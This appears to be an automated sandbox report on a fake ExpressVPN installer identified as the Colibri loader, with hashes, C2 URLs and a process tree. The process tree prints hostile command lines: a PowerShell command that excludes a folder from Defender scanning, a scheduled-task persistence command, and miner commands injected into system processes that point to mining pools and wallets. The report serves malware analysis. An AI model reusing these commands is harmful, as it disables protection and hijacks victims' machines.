colibri | 9cb9bb13a44968f6b919829342f692d27d45b66cc1e0108a072d7ba3d940fe1a

General

Target

ExpressVPN_setup.exe
Size

2.3MB
MD5

b8a48ef181d65145334e2ff0e0d3fbf6
SHA1

53263570e35e8d528c4f56073dc2ba6e9a97819c
SHA256

9cb9bb13a44968f6b919829342f692d27d45b66cc1e0108a072d7ba3d940fe1a
SHA512

fc5a22ba1cc008132ef3ecd16119896477057a174b002da01fa28b246396fb2b372d1cf768fee6a8c799413762d476d01139f340a2b3e8336364d758cf482b19

Score

10^/10

colibri build1 loader upx

Malware Config

Extracted

Family

colibri

Version

1.2.0

Botnet

Build1

C2

http://zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc/gate.php

http://yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx/gate.php

Signatures

Colibri Loader
A loader sold as MaaS first seen in August 2021.
loader colibri
Executes dropped EXE 3 IoCs

Processes:

DHUZT.exetmpCB53.tmp.exetmpCB53.tmp.exe

pid process

2240 DHUZT.exe
1436 tmpCB53.tmp.exe
3524 tmpCB53.tmp.exe

pid	process
2240	DHUZT.exe
1436	tmpCB53.tmp.exe
3524	tmpCB53.tmp.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/1400-168-0x0000000140000000-0x0000000142EFE000-memory.dmp	upx
behavioral2/memory/1400-170-0x0000000140000000-0x0000000142EFE000-memory.dmp	upx

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

DHUZT.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-1502147629-2175634256-330282290-1000\Control Panel\International\Geo\Nation DHUZT.exe
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1502147629-2175634256-330282290-1000\Control Panel\International\Geo\Nation	DHUZT.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

tmpCB53.tmp.exeDHUZT.exe

description	pid	process	target process
PID 1436 set thread context of 3524	1436	tmpCB53.tmp.exe	tmpCB53.tmp.exe
PID 2240 set thread context of 664	2240	DHUZT.exe	vbc.exe
PID 2240 set thread context of 1400	2240	DHUZT.exe	explorer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

3732 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

1820 timeout.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exeDHUZT.exe

pid process

4952 powershell.exe
4952 powershell.exe
1776 powershell.exe
1776 powershell.exe
2240 DHUZT.exe
2240 DHUZT.exe

pid	process
3732	schtasks.exe

pid	process
1820	timeout.exe

pid	process
4952	powershell.exe
4952	powershell.exe
1776	powershell.exe
1776	powershell.exe
2240	DHUZT.exe
2240	DHUZT.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

ExpressVPN_setup.exepowershell.exeDHUZT.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3288	ExpressVPN_setup.exe
Token: SeDebugPrivilege	4952	powershell.exe
Token: SeDebugPrivilege	2240	DHUZT.exe
Token: SeDebugPrivilege	1776	powershell.exe

Suspicious use of WriteProcessMemory 47 IoCs

Processes:

ExpressVPN_setup.execmd.exeDHUZT.execmd.exetmpCB53.tmp.exevbc.exe

description	pid	process	target process
PID 3288 wrote to memory of 4952	3288	ExpressVPN_setup.exe	powershell.exe
PID 3288 wrote to memory of 4952	3288	ExpressVPN_setup.exe	powershell.exe
PID 3288 wrote to memory of 2076	3288	ExpressVPN_setup.exe	cmd.exe
PID 3288 wrote to memory of 2076	3288	ExpressVPN_setup.exe	cmd.exe
PID 2076 wrote to memory of 1820	2076	cmd.exe	timeout.exe
PID 2076 wrote to memory of 1820	2076	cmd.exe	timeout.exe
PID 2076 wrote to memory of 2240	2076	cmd.exe	DHUZT.exe
PID 2076 wrote to memory of 2240	2076	cmd.exe	DHUZT.exe
PID 2240 wrote to memory of 1776	2240	DHUZT.exe	powershell.exe
PID 2240 wrote to memory of 1776	2240	DHUZT.exe	powershell.exe
PID 2240 wrote to memory of 3848	2240	DHUZT.exe	cmd.exe
PID 2240 wrote to memory of 3848	2240	DHUZT.exe	cmd.exe
PID 3848 wrote to memory of 3732	3848	cmd.exe	schtasks.exe
PID 3848 wrote to memory of 3732	3848	cmd.exe	schtasks.exe
PID 2240 wrote to memory of 1436	2240	DHUZT.exe	tmpCB53.tmp.exe
PID 2240 wrote to memory of 1436	2240	DHUZT.exe	tmpCB53.tmp.exe
PID 2240 wrote to memory of 1436	2240	DHUZT.exe	tmpCB53.tmp.exe
PID 1436 wrote to memory of 3524	1436	tmpCB53.tmp.exe	tmpCB53.tmp.exe
PID 1436 wrote to memory of 3524	1436	tmpCB53.tmp.exe	tmpCB53.tmp.exe
PID 1436 wrote to memory of 3524	1436	tmpCB53.tmp.exe	tmpCB53.tmp.exe
PID 1436 wrote to memory of 3524	1436	tmpCB53.tmp.exe	tmpCB53.tmp.exe
PID 1436 wrote to memory of 3524	1436	tmpCB53.tmp.exe	tmpCB53.tmp.exe
PID 1436 wrote to memory of 3524	1436	tmpCB53.tmp.exe	tmpCB53.tmp.exe
PID 1436 wrote to memory of 3524	1436	tmpCB53.tmp.exe	tmpCB53.tmp.exe
PID 2240 wrote to memory of 664	2240	DHUZT.exe	vbc.exe
PID 2240 wrote to memory of 664	2240	DHUZT.exe	vbc.exe
PID 2240 wrote to memory of 664	2240	DHUZT.exe	vbc.exe
PID 2240 wrote to memory of 664	2240	DHUZT.exe	vbc.exe
PID 2240 wrote to memory of 664	2240	DHUZT.exe	vbc.exe
PID 2240 wrote to memory of 664	2240	DHUZT.exe	vbc.exe
PID 2240 wrote to memory of 664	2240	DHUZT.exe	vbc.exe
PID 2240 wrote to memory of 664	2240	DHUZT.exe	vbc.exe
PID 2240 wrote to memory of 664	2240	DHUZT.exe	vbc.exe
PID 2240 wrote to memory of 664	2240	DHUZT.exe	vbc.exe
PID 2240 wrote to memory of 664	2240	DHUZT.exe	vbc.exe
PID 2240 wrote to memory of 664	2240	DHUZT.exe	vbc.exe
PID 2240 wrote to memory of 664	2240	DHUZT.exe	vbc.exe
PID 2240 wrote to memory of 664	2240	DHUZT.exe	vbc.exe
PID 664 wrote to memory of 3056	664	vbc.exe	cmd.exe
PID 664 wrote to memory of 3056	664	vbc.exe	cmd.exe
PID 2240 wrote to memory of 1400	2240	DHUZT.exe	explorer.exe
PID 2240 wrote to memory of 1400	2240	DHUZT.exe	explorer.exe
PID 2240 wrote to memory of 1400	2240	DHUZT.exe	explorer.exe
PID 2240 wrote to memory of 1400	2240	DHUZT.exe	explorer.exe
PID 2240 wrote to memory of 1400	2240	DHUZT.exe	explorer.exe
PID 2240 wrote to memory of 1400	2240	DHUZT.exe	explorer.exe
PID 2240 wrote to memory of 1400	2240	DHUZT.exe	explorer.exe

C:\Users\Admin\AppData\Local\Temp\ExpressVPN_setup.exe
"C:\Users\Admin\AppData\Local\Temp\ExpressVPN_setup.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3288

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4952

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpB26C.tmp.bat""
2⤵
- Suspicious use of WriteProcessMemory
PID:2076

C:\Windows\system32\timeout.exe
timeout 3
3⤵
- Delays execution with timeout.exe
PID:1820

C:\ProgramData\ccl\DHUZT.exe
"C:\ProgramData\ccl\DHUZT.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2240

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1776

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "DHUZT" /tr "C:\ProgramData\ccl\DHUZT.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:3848

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "DHUZT" /tr "C:\ProgramData\ccl\DHUZT.exe"
5⤵
- Creates scheduled task(s)
PID:3732

C:\Users\Admin\AppData\Local\Temp\tmpCB53.tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmpCB53.tmp.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1436

C:\Users\Admin\AppData\Local\Temp\tmpCB53.tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmpCB53.tmp.exe"
5⤵
- Executes dropped EXE
PID:3524

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RGvbrbsSuWBAhQiVVqYY73R6VMCC1AwQYi.work -p x -t 5
4⤵
- Suspicious use of WriteProcessMemory
PID:664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
5⤵
PID:3056

C:\Windows\explorer.exe
C:\Windows\explorer.exe --algo ETHASH --pool eu1.ethermine.org:4444 --user 0x4ab03527AFE5eA0Dd109B60309b01Cf15c83E0eB.RIG_1
4⤵
PID:1400

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

1

T1064

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Scripting

1

T1064

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\ccl\DHUZT.exe
Filesize
2.3MB

MD5
b8a48ef181d65145334e2ff0e0d3fbf6

SHA1
53263570e35e8d528c4f56073dc2ba6e9a97819c

SHA256
9cb9bb13a44968f6b919829342f692d27d45b66cc1e0108a072d7ba3d940fe1a

SHA512
fc5a22ba1cc008132ef3ecd16119896477057a174b002da01fa28b246396fb2b372d1cf768fee6a8c799413762d476d01139f340a2b3e8336364d758cf482b19

Download Submit
C:\ProgramData\ccl\DHUZT.exe
Filesize
2.3MB

MD5
b8a48ef181d65145334e2ff0e0d3fbf6

SHA1
53263570e35e8d528c4f56073dc2ba6e9a97819c

SHA256
9cb9bb13a44968f6b919829342f692d27d45b66cc1e0108a072d7ba3d940fe1a

SHA512
fc5a22ba1cc008132ef3ecd16119896477057a174b002da01fa28b246396fb2b372d1cf768fee6a8c799413762d476d01139f340a2b3e8336364d758cf482b19

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
440cb38dbee06645cc8b74d51f6e5f71

SHA1
d7e61da91dc4502e9ae83281b88c1e48584edb7c

SHA256
8ef7a682dfd99ff5b7e9de0e1be43f0016d68695a43c33c028af2635cc15ecfe

SHA512
3aab19578535e6ba0f6beb5690c87d970292100704209d2dcebddcdd46c6bead27588ef5d98729bfd50606a54cc1edf608b3d15bef42c13b9982aaaf15de7fd6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
d260b9113078da49af4677c7901f5a03

SHA1
7d0778773d3d1e765a884bb03acdbccdeece582c

SHA256
e4e51ddb68b0d36fd0d284c35a13e24dcd60b405fde030db98d73e5035fc028a

SHA512
e89c9b953aca2f489affeacc6392459f55ae78658a65d78802f4468c0dddd1689092c84bed3d7cb199bb508558fd1997f757422d76b82d55b1c070f64845d356

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpB26C.tmp.bat
Filesize
137B

MD5
882ab46b456b04da4b3a51f6491990be

SHA1
cca66a80cd07edc8da762633d20e1c0384d5851d

SHA256
ba8139d28b5b3b51a16f0cf60d090c3667d9ad3ad5767db42eb9adedb993504f

SHA512
74a095880cfa9d876f9f9394a83ef750ba339d53841e2ad447912555c90e00d14cbaa4d0d8531b210392072841bf52c7acae246b786b390fb9de2a855c798356

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpCB53.tmp.exe
Filesize
74KB

MD5
cdd3d44d9e64a113618961f0a4e691b9

SHA1
a762037bc50ddb7507d5ef1a20ce813ad990bb54

SHA256
dbeb4b5ef3a49b4df0bc816a52f875e5aa6ad674aa8e2b458e9736da0b366ec0

SHA512
55146e6464bf74266520341fae0b097ddfea1d6ed7fadf7e0dcf0eba7ac1c29384ad76f245994ea69f68dc85cdcdcb9fc4a2a1eede5db95001dbcd870505a3d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpCB53.tmp.exe
Filesize
74KB

MD5
cdd3d44d9e64a113618961f0a4e691b9

SHA1
a762037bc50ddb7507d5ef1a20ce813ad990bb54

SHA256
dbeb4b5ef3a49b4df0bc816a52f875e5aa6ad674aa8e2b458e9736da0b366ec0

SHA512
55146e6464bf74266520341fae0b097ddfea1d6ed7fadf7e0dcf0eba7ac1c29384ad76f245994ea69f68dc85cdcdcb9fc4a2a1eede5db95001dbcd870505a3d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpCB53.tmp.exe
Filesize
74KB

MD5
cdd3d44d9e64a113618961f0a4e691b9

SHA1
a762037bc50ddb7507d5ef1a20ce813ad990bb54

SHA256
dbeb4b5ef3a49b4df0bc816a52f875e5aa6ad674aa8e2b458e9736da0b366ec0

SHA512
55146e6464bf74266520341fae0b097ddfea1d6ed7fadf7e0dcf0eba7ac1c29384ad76f245994ea69f68dc85cdcdcb9fc4a2a1eede5db95001dbcd870505a3d8

Download Submit
memory/664-167-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/664-161-0x000000014006EE80-mapping.dmp

Download
memory/664-160-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/664-162-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/664-163-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/664-165-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/1400-168-0x0000000140000000-0x0000000142EFE000-memory.dmp

Filesize
47.0MB

Download
memory/1400-169-0x0000000142EFC000-mapping.dmp

Download
memory/1400-170-0x0000000140000000-0x0000000142EFE000-memory.dmp

Filesize
47.0MB

Download
memory/1436-152-0x0000000000000000-mapping.dmp

Download
memory/1436-155-0x00000000013B0000-0x00000000013B2000-memory.dmp

Filesize
8KB

Download
memory/1776-146-0x0000000000000000-mapping.dmp

Download
memory/1776-151-0x00007FFCFAD50000-0x00007FFCFB811000-memory.dmp

Filesize
10.8MB

Download
memory/1820-138-0x0000000000000000-mapping.dmp

Download
memory/2076-134-0x0000000000000000-mapping.dmp

Download
memory/2240-166-0x00007FFCFAD50000-0x00007FFCFB811000-memory.dmp

Filesize
10.8MB

Download
memory/2240-145-0x00007FFCFAD50000-0x00007FFCFB811000-memory.dmp

Filesize
10.8MB

Download
memory/2240-142-0x0000000000000000-mapping.dmp

Download
memory/2240-171-0x00007FFCFAD50000-0x00007FFCFB811000-memory.dmp

Filesize
10.8MB

Download
memory/3056-164-0x0000000000000000-mapping.dmp

Download
memory/3288-136-0x00007FFCFAD50000-0x00007FFCFB811000-memory.dmp

Filesize
10.8MB

Download
memory/3288-135-0x00007FFCFAD50000-0x00007FFCFB811000-memory.dmp

Filesize
10.8MB

Download
memory/3288-132-0x0000000000840000-0x0000000000A86000-memory.dmp

Filesize
2.3MB

Download
memory/3524-159-0x0000000000400000-0x0000000000407000-memory.dmp

Filesize
28KB

Download
memory/3524-156-0x0000000000000000-mapping.dmp

Download
memory/3524-157-0x0000000000400000-0x0000000000407000-memory.dmp

Filesize
28KB

Download
memory/3732-150-0x0000000000000000-mapping.dmp

Download
memory/3848-148-0x0000000000000000-mapping.dmp

Download
memory/4952-140-0x00007FFCFAD50000-0x00007FFCFB811000-memory.dmp

Filesize
10.8MB

Download
memory/4952-133-0x0000000000000000-mapping.dmp

Download
memory/4952-141-0x00007FFCFAD50000-0x00007FFCFB811000-memory.dmp

Filesize
10.8MB

Download
memory/4952-139-0x000001C8EF3A0000-0x000001C8EF3C2000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads